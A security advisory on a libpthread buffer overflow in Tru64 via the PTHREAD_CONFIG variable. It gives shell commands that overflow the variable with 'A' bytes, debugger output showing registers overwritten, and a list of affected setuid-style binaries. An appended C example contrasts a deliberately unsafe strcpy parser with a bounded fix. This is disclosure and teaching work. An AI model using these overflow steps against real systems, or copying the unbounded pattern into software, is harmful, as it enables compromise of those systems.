The pthread library (libpthread) provides "interfaces for developing multi-threaded applications". libpthread suffers from a buffer overflow vulnerability which may enable an attacker to execute arbitrary commands on the system. This vulnerability may potentially be exploited by creating a specially crafted buffer and inserting it into the PTHREAD_CONFIG environment variable.
Credit:
The information has been provided by Netragard Security Advisories.
Vulnerable Systems:
* libpthread version 5.1b (HPUX)
libpthread reads in the PTHREAD_CONFIG environment variable. It may be possible to exploit libpthread on HP's tru64 by creating a specially crafted buffer. The details below do not contain the specially crafted buffer. Exploitation of this specific vulnerability is very difficult.
#############################################
#
# Insert 273 A's (41) into the PTHREAD_CONFIG variable
#
#############################################
OSF1 tru64 V5.1 2650 alpha
bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 273'`
bash-3.00# newaliases
Segmentation fault (core dumped)
#############################################
#
# Insert 274 A's (41) into the PTHREAD_CONFIG variable
#
#############################################
bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 274'`
bash-3.00# newaliases
Unaligned access pid=15750 <newaliases> va=0x11fff00a4 pc=0x3ff805c8bf8 ra=0x3ff805c8bf8 inst=0xa4290040
Unaligned access pid=15750 <newaliases> va=0x11fff00bc pc=0x3ff805c8bfc ra=0x3ff805c8bf8 inst=0xa4490058
Unaligned access pid=15750 <newaliases> va=0x11fff008c pc=0x3ff805c8c48 ra=0x3ff805c8bf8 inst=0xa5090028
#############################################
#
# Run newaliases in gdb with the -q flag.
#
#############################################
bash-3.00# gdb /tmp/newaliases -q
(no debugging symbols found)...(gdb) r
Starting program: /tmp/newaliases
(no debugging symbols found)... (no debugging symbols found)... (no debugging symbols found)... (no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so
#############################################
#
# Execute a back trace (bt) within gdb
#
#############################################
(gdb) bt
#0 0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so
#1 0x3ff805c8a78 in __putFormatEol () from /usr/shlib/libpthread.so
#2 0x3ff805bc4f8 in __utlOptManage () from /usr/shlib/libpthread.so
warning: Hit heuristic-fence-post without finding
warning: enclosing function for address 0x4141414141414141
This warning occurs if you are debugging a function without any symbols (for example, in a stripped executable). In that case, you may wish to increase the size of the search with the `set heuristic-fence-post' command.
Otherwise, you told GDB there was a function where there isn't one, or (more likely) you have encountered a bug in GDB.
#
# Execute Info Registers within gdb
#
(gdb) i r
v0 0x226 550
t0 0x11fff9b3e 4831812414
t1 0x0 0
t2 0x2 2
t3 0x0 0
t4 0x3ffc0081a00 4396973300224
t5 0x40 64
t6 0x7fffffe6 2147483622
t7 0x19 25
s0 0x4141414141414141 4702111234474983745
s1 0x11fff9c90 4831812752
s2 0x11fff9c88 4831812744
s3 0x0 0
s4 0x0 0
s5 0x11fff9ad8 4831812312
fp 0x1 1
a0 0xbf 191
a1 0x11fff9918 4831811864
a2 0x11fff96b0 4831811248
a3 0x11fff9b34 4831812404
a4 0x0 0
a5 0x11fff9b30 4831812400
t8 0x11fff9931 4831811889
t9 0x62 98
t10 0x49 73
t11 0x1 1
ra 0x3ff805c8bf8 4395905092600
t12 0x3ff801c1380 4395900867456
at 0x41416469 1094804585
gp 0x3ffc01c0170 4396974604656
sp 0x11fff98b0 4831811760
zero 0x0 0
fpcr 0x0 0
pc 0x3ff805c8bf8 4395905092600
vfp 0x11fff9900 4831811840
frame 2
v0 0x226 550
t0 0x11fff9b3e 4831812414
t1 0x0 0
t2 0x2 2
t3 0x0 0
t4 0x3ffc0081a00 4396973300224
t5 0x11fff9a50 4831812176
t6 0x7fffffe6 2147483622
t7 0x19 25
s0 0x1 1
s1 0x11fff9c90 4831812752
s2 0x11fff9c88 4831812744
s3 0x0 0
s4 0x0 0
s5 0x11fff9ad8 4831812312
fp 0x1 1
###############################################
#
# The following registers, a0, a1, a2, a3, a4, a5, have been
# overwritten with A's (0x41).
#
###############################################
a0 0x4141414141414141 4702111234474983745
a1 0x4141414141414141 4702111234474983745
a2 0x4141414141414141 4702111234474983745
a3 0x4141414141414141 4702111234474983745
a4 0x4141414141414141 4702111234474983745
a5 0x4141414141414141 4702111234474983745
t8 0x11fff9931 4831811889
t9 0x62 98
t10 0x49 73
t11 0x1 1
ra 0x3ff805bc4f8 4395905041656
t12 0x3ff801c1380 4395900867456
at 0x41416469 1094804585
gp 0x3ffc01c0170 4396974604656
sp 0x11fff9a80 4831812224
zero 0x0 0
fpcr 0x0 0
pc 0x3ff805bc4f8 4395905041656
############################################
#
# Other binaries which are linked against libpthread.so
# will also segfault when the PTHREAD_CONFIG variable
# is set to a large string of A's. The following is
# a list of some of those binaries
#
############################################
/usr/sbin/mailq
/usr/sbin/sendmail
/usr/sbin/sendmail.v8.11.1
/usr/sbin/smtpd
/usr/sbin/collect
/usr/dt/bin/mailcv
############################################
#
# Sendmail Example. Loading sendmail core file with
# the tru64 debugger.
#
############################################
bash-3.00# dbx ./sendmail core
dbx version 5.1
Type 'help' for help.
Core file created by program "sendmail"
warning: ./sendmail has no symbol table -- very little is supported without it
signal Segmentation fault at >*[__putString, 0x3ff805c8bf8] ldq t0, 64(s0)
(dbx) where
> 0 __putString(0x0, 0x0, 0x11fffbad8, 0x1, 0x11fffb918) [0x3ff805c8bf8]
1 __putFormatEol(0x4141414141414141, 0x4141414141414141, 0x4141414141414141, 0x4141414141414141, 0x4141414141414141) [0x3ff805c8a74]
2 __utlOptManage(0x30002800000, 0x26000, 0x3ff805c09c4, 0x3ffc01b8098, 0x3ff805c0a14) [0x3ff805bc4f4]
################################################
#
# Older versions are also vulnerable...
#
################################################
tru64.netragard> uname -a
OSF1 tru64.netragard V5.0 910 alpha
tru64.netragard> PTHREAD_CONFIG=`perl -e 'print "A"x 272'`
tru64.netragard> export PTHREAD_CONFIG
tru64.netragard> /usr/dt/bin/mailcv
%PTHREAD_CONFIG keyword
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA"
is not valid
Memory fault
Other binaries on 5.0:
/usr/bin/ladebug
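The crashes above all come from one pattern: a library copies an environment value into a fixed-size buffer without checking its length, so a 273- or 274-byte value runs past the buffer into saved registers (the 0x4141414141414141 in s0 and a0..a5). The following is an added example, not libpthread's code and not from the advisory: a small hypothetical keyword parser in its unbounded "before" form next to a bounded "after" form that refuses values which would not fit. The buffer size KEYWORD_BUF, the function names, and the sample keyword "example_key=1" are assumptions chosen for the demonstration; the real libpthread limit is not given on the page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical keyword buffer size; the real libpthread limit is not given on the page. */
#define KEYWORD_BUF 64

/* "Before": the defect class the advisory describes. A fixed-size stack
 * buffer receives the environment value with no length check, so a value
 * longer than the buffer overwrites whatever follows it on the stack.
 * Only ever called with short input in this example; shown for contrast. */
int parse_config_unbounded(const char *value)
{
    char keyword[KEYWORD_BUF];
    strcpy(keyword, value);               /* overflows when strlen(value) >= KEYWORD_BUF */
    return (int)strlen(keyword);
}

/* "After": measure the value against the destination size first and reject
 * oversized values outright rather than truncating them (a silently truncated
 * config keyword would be wrong in a different way). Returns 0 on success,
 * -1 when the value is missing or does not fit with its terminator. */
int parse_config_bounded(const char *value, char *out, size_t outsz)
{
    if (value == NULL || outsz == 0)
        return -1;
    size_t n = 0;
    while (n < outsz && value[n] != '\0')  /* never scans past outsz bytes */
        n++;
    if (n >= outsz)
        return -1;                         /* would not fit including '\0' */
    memcpy(out, value, n + 1);
    return 0;
}

/* Constructs the advisory's test input: `count` bytes of 'A' (0x41).
 * The caller frees the result. */
char *make_a_string(size_t count)
{
    char *s = malloc(count + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'A', count);
    s[count] = '\0';
    return s;
}

/* Reads PTHREAD_CONFIG from the real environment, or falls back to the
 * constructed 274-byte value, and reports whether the bounded parser accepts it. */
int main(void)
{
    char keyword[KEYWORD_BUF];
    const char *value = getenv("PTHREAD_CONFIG");
    char *fallback = NULL;
    if (value == NULL) {
        fallback = make_a_string(274);     /* the length that overwrote a0..a5 in the advisory */
        value = fallback;
    }
    if (parse_config_bounded(value, keyword, sizeof keyword) == 0)
        printf("accepted keyword: %s\n", keyword);
    else
        printf("rejected: value of %zu bytes does not fit a %d-byte buffer\n",
               strlen(value), KEYWORD_BUF);
    free(fallback);
    return 0;
}
```

The bounded version deliberately counts at most outsz bytes of the input before deciding, so an unterminated or enormous value costs no more than one buffer's worth of reads, and it never partially fills the destination on failure.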